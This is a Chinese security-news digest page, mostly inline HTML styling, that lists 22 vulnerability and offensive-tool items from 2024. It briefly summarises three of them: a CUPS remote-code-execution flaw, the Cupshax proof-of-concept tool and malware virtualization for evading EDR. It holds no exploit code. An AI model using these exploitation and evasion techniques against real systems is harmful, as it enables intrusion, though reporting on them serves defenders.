0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-0927】CUPS打印系统漏洞报告泄露<br/>0x02 【2024-0927】CUPS漏洞快速概念验证<br/>0x03 【2024-0927】恶意软件虚拟化在EDR时代的逃避策略<br/>0x04 【2024-0927】利用ProxyNotShell后的Exchange PowerShell：无参数构造函数<br/>0x05 【2024-0927】中国防火墙引发的漏洞问题<br/>0x06 【2024-0928】通过RPC调用Google Chrome提升服务解密App绑定密钥<br/>0x07 【2024-0928】Supermicro 系统漏洞 CVE-2024-36435 的 PoC 工具<br/>0x08 【2024-0929】Office URI方案中的NTLMv2哈希捕获漏洞<br/>0x09 【2024-0929】检测和缓解Active Directory的妥协<br/>0x0a 【2024-0929】CVE-2024-6769：利用激活缓存漏洞从中等权限提升至高权限<br/>0x0b 【2024-0929】Zimbra邮件平台远程命令执行漏洞（CVE-2024-45519）<br/>0x0c 【2024-1009】Ruby-SAML库中的GitLab认证绕过漏洞分析<br/>0x0d 【2024-1009】通过iTunes利用的Windows本地权限提升漏洞<br/>0x0e 【2024-1009】Zimbra Postjournal漏洞利用指南<br/>0x0f 【2024-1009】PrintNightmare漏洞仍未解决<br/>0x10 【2024-1009】C#程序查找Windows Defender文件夹排除项<br/>0x11 【2024-1009】TeamViewer漏洞利用：非特权用户加载任意内核驱动<br/>0x12 【2024-1009】识别常见EDR进程和服务的工具Invoke-EDRChecker<br/>0x13 【2024-1009】基于Socks5代理的Windows管理员级植入工具包<br/>0x14 【2024-1009】CVE-2024-38816 路径遍历漏洞概念验证<br/>0x15 【2024-1010】Pwnlook：一款控制Outlook应用的攻击后利用工具<br/>0x16 【2024-1010】利用Visual Studio转储文件的CVE-2024-30052漏洞<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 CUPS打印系统漏洞报告泄露</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">CUPS系统的多个组件存在漏洞，可能导致远程代码执行。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.2037037037037037" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=77a42e60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuv0nEPXBnwGQqIaibvoNfNaW2EVyI5a9nS34iboqfGZJDBkTMiblJOzicCg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu0kQgrxIqwvWSCiaeibeqPeVtowZDTia8egqC1LN2jwx0tgkj5v6roJIkg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu0kQgrxIqwvWSCiaeibeqPeVtowZDTia8egqC1LN2jwx0tgkj5v6roJIkg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525424482148112"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CUPS打印系统的漏洞可能导致严重的安全风险，包括远程代码执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞利用的方式包括通过UDP端口631接收任何来源的自定义数据包，以及通过mDNS广播。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">受影响的系统包括多种GNU/Linux发行版、Google ChromeOS和大多数BSD系统。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的根本原因在于CUPS打印机发现机制（cups-browsed）和其他CUPS系统组件没有对外部输入进行足够的消毒和验证。</section></li></ul>
	<br/>
	<p>🏷️: CUPS, 漏洞, 泄露, OpenPrinting, GitHub</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 CUPS漏洞快速概念验证</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Cupshax 网页提供了一个针对最近 CUPS 漏洞的快速概念验证（PoC），该漏洞允许远程代码执行。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fa29ceb4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuxQmnwG9MywWDKmPAoictaqY8xibicgMsnmoWib5f1Gic4a8DAibGuoTAZKLQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CUPS 漏洞允许 Linux 远程代码执行</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuHwI5GicmWziaVsULZZNCD0r8JLicHtghjLXsVhVm7jhAtnjZbFxVBedgQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuHwI5GicmWziaVsULZZNCD0r8JLicHtghjLXsVhVm7jhAtnjZbFxVBedgQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525424482111852"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Cupshax 是针对 CUPS 漏洞的一个快速开发的 PoC 工具。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具的开发受到了公开的 OpenPrinting CUPS 仓库中的一个提交的启发，但由于 embargo 提前结束，工具代码相对仓促。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Cupshax 依赖于 dns-sd 打印机发现，需要目标设备与攻击者在同一网络中。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用工具使用了 zeroconf 和 ippserver，可以通过 pip 安装。</section></li></ul>
	<br/>
	<p>🏷️: CUPS, 漏洞, 技术细节, PoC, dns-sd</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 恶意软件虚拟化在EDR时代的逃避策略</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">網頁主要介述了在端點检测和响应(EDR)技術日益先进的情况下，紅隊如何通過恶意软件虚拟化技術來实现对EDR系统的逃避。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EDR时代下的红队攻击：利用恶意软件虚拟化逃避端点检测</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EDR 时代下的红队攻击：利用恶意软件虚拟化绕过终端检测</section></li></ul>
	<section>
